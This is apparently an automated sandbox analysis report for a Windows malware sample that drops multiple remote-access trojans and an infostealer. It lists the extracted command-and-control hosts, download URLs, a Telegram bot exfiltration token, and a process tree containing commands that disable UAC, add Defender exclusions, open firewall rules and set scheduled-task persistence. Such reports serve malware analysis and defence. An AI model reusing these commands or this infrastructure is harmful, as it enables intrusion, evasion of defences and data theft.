Resubmissions
25-01-2025 23:53
250125-3w9aqawpap 1025-01-2025 23:45
250125-3r6c9stre1 1025-01-2025 01:01
250125-bc9zcsypbn 1013-01-2025 17:50
250113-wewjza1pes 1013-01-2025 17:32
250113-v4m4fssrgj 10Analysis
-
max time kernel
71s -
max time network
199s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
-
submitted
25-01-2025 01:01
Errors
General
-
Target
New Text Document mod.exe
-
Size
761KB
-
MD5
c6040234ee8eaedbe618632818c3b1b3
-
SHA1
68115f8c3394c782aa6ba663ac78695d2b80bf75
-
SHA256
bb459869e5ef6d6dd6f0329080d7cb12542c4b37163ae2cd782620adcd7d55a0
-
SHA512
a3d8c8c6a990797a99887e0e07a01b1e2fe0a4e53df7294fed18a1e856d56a7762e0ab4a8e4689de411acb4fd29b8d7e247fbc696d855a9976a760d33ab60bcf
-
SSDEEP
12288:mMSApJVYG5lDLyjsb0eOzkv4R7QnvUUilQ35+6G75V9mWej:mnsJ39LyjbJkQFMhmC+6GD9I
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Extracted
asyncrat
0.5.7B
System Program
tuna91.duckdns.org:1604
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
true
-
install_file
system.exe
-
install_folder
%AppData%
Extracted
remcos
RemoteHost
else-directors.gl.at.ply.gg:56448
stopeet.camdvr.org:2404
amalar.camdvr.org:2404
prosir.casacam.net:2404
185.158.251.159:2404
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
$77-Bitdefender.exe
-
copy_folder
Bitdefender
-
delete_file
true
-
hide_file
true
-
hide_keylog_file
false
-
install_flag
true
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-Z3DS2J
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
startup_value
VisualStudioServer
-
take_screenshot_option
false
-
take_screenshot_time
5
Extracted
xworm
5.0
137.184.74.73:5000
WlO6Om8yfxIARVE4
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/7G6zzQwJ
Extracted
quasar
1.4.1
bot
wexos47815-61484.portmap.host:61484
06e2bb33-968c-4ca7-97dc-f23fbd5c3092
-
encryption_key
8924CB3C9515DA437A37F5AE598376261E5528FC
-
install_name
msinfo32.exe
-
log_directory
Update
-
reconnect_delay
3000
-
startup_key
Discordupdate
-
subdirectory
dll32
Extracted
xworm
3.1
172.86.108.55:7771
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
quasar
1.4.1
VM-KU
adidya354-21806.portmap.host:21806
cf7c4d30-a326-47cc-a5f0-5a19aa014204
-
encryption_key
E50BC33BC56B70B1A2963DE6EA1855A0E0D0FBCE
-
install_name
Windows Shell Interactive.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Shell Interactive
Extracted
asyncrat
A 13
Default
163.172.125.253:333
AsyncMutex_555223
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
asyncrat
Esco Private rat
Default
93.123.109.39:4449
bcrikqwuktplgvg
-
delay
1
-
install
false
-
install_folder
%AppData%
Extracted
quasar
1.4.1
Office04
192.168.1.79:4782
0.tcp.in.ngrok.io:14296
193.161.193.99:20466
956eafb2-7482-407b-bff4-d2b57a1c3d75
-
encryption_key
EFEBD005E03B8B8669985D9A167E2BEF9FFCA477
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
quasar
1.3.0.0
School
gamwtonxristo.ddns.net:1717
QSR_MUTEX_M3Vba1npfJg3Ale25C
-
encryption_key
VtojWKM7f1XyCVdB41wL
-
install_name
comctl32.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Defender Startup Scan
-
subdirectory
Windows Defender
Extracted
asyncrat
0.5.8
Default
2.tcp.eu.ngrok.io:19695
gonq3XlXWgiz
-
delay
3
-
install
false
-
install_folder
%AppData%
Extracted
stealerium
https://api.telegram.org/bot6926474815:AAFx9tLAnf5OAVQZp2teS3G2_6T1wCP67xM/sendMessage?chat_id=-4224073938
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Detect Xworm Payload 5 IoCs
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
Nanocore family
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 12 IoCs
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
Stealerium
An open source info stealer written in C# first seen in May 2022.
-
Stealerium family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
UAC bypass 3 TTPs 2 IoCs
-
Xred
Xred is backdoor written in Delphi.
-
Xred family
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
Async RAT payload 4 IoCs
-
Adds policy Run key to start application 2 TTPs 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file 21 IoCs
-
Modifies Windows Firewall 2 TTPs 17 IoCs
-
Drops startup file 25 IoCs
-
Executes dropped EXE 43 IoCs
-
Loads dropped DLL 2 IoCs
-
Adds Run key to start application 2 TTPs 8 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 22 IoCs
-
Suspicious use of SetThreadContext 3 IoCs
-
Drops file in Program Files directory 10 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Program crash 4 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 50 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 24 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 2 IoCs
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies registry class 3 IoCs
-
Modifies registry key 1 TTPs 4 IoCs
-
Runs ping.exe 1 TTPs 24 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 36 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 7 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 44 IoCs
-
Suspicious use of SetWindowsHookEx 18 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"2⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\._cache_New Text Document mod.exe"3⤵
- Downloads MZ/PE file
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"C:\Users\Admin\AppData\Local\Temp\a\ApiUpdater.exe"4⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Bitdefender\$77-Bitdefender.exe"6⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Bitdefender\$77-Bitdefender.exeC:\ProgramData\Bitdefender\$77-Bitdefender.exe7⤵
- Adds policy Run key to start application
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f9⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
-
-
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"8⤵
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force5⤵
- Drops startup file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\36.exe"C:\Users\Admin\AppData\Local\Temp\a\36.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5676 -s 3965⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\99999.exe"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\22.exe"C:\Users\Admin\AppData\Local\Temp\a\22.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\a\payload.exe"C:\Users\Admin\AppData\Local\Temp\a\payload.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f5⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"5⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f6⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JYGJDLSAJG4z.bat" "6⤵
-
C:\Windows\system32\chcp.comchcp 650017⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"7⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f8⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rbeUW2eCLHuR.bat" "8⤵
-
C:\Windows\system32\chcp.comchcp 650019⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"9⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV111⤵
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yVlExH9c0E8u.bat" "10⤵
-
C:\Windows\system32\chcp.comchcp 6500111⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"11⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f12⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\lznlA0cVh6gI.bat" "12⤵
-
C:\Windows\system32\chcp.comchcp 6500113⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"13⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f14⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uylfJE25nhK0.bat" "14⤵
-
C:\Windows\system32\chcp.comchcp 6500115⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"15⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f16⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HnXFqMmMXqJu.bat" "16⤵
-
C:\Windows\system32\chcp.comchcp 6500117⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"17⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f18⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\42dXWaV7fELg.bat" "18⤵
-
C:\Windows\system32\chcp.comchcp 6500119⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"19⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f20⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\k6GhT5DwZSSB.bat" "20⤵
-
C:\Windows\system32\chcp.comchcp 6500121⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"21⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f22⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dD0sSU6Im7sT.bat" "22⤵
-
C:\Windows\system32\chcp.comchcp 6500123⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"23⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f24⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Network.exe"C:\Users\Admin\AppData\Local\Temp\a\Network.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\a\Network.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Network.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Network.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Network" /tr "C:\Users\Admin\AppData\Roaming\Network.exe"5⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\rea.exe"C:\Users\Admin\AppData\Local\Temp\a\rea.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
\??\c:\program files (x86)\internet explorer\iexplore.exe"c:\program files (x86)\internet explorer\iexplore.exe"5⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"C:\Users\Admin\AppData\Local\Temp\a\MSystem32.exe"4⤵
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DOS Manager" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC052.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\schtasks.exe"schtasks.exe" /create /f /tn "DOS Manager Task" /xml "C:\Users\Admin\AppData\Local\Temp\tmpC545.tmp"5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"C:\Users\Admin\AppData\Local\Temp\a\SharpHound.exe"4⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\a\mod.exe"C:\Users\Admin\AppData\Local\Temp\a\mod.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Local\Temp\a\Server.exe"C:\Users\Admin\AppData\Local\Temp\a\Server.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"5⤵
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE6⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"7⤵
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE8⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV19⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"9⤵
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE10⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"11⤵
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE12⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"12⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"13⤵
- Drops startup file
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE14⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"14⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"15⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE16⤵
- Modifies Windows Firewall
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"16⤵
-
C:\Users\Admin\AppData\Local\Temp\server.exe"C:\Users\Admin\AppData\Local\Temp\server.exe"17⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE18⤵
- Modifies Windows Firewall
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV119⤵
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"C:\Users\Admin\AppData\Roaming\Microsoft\svchost.exe"18⤵
-
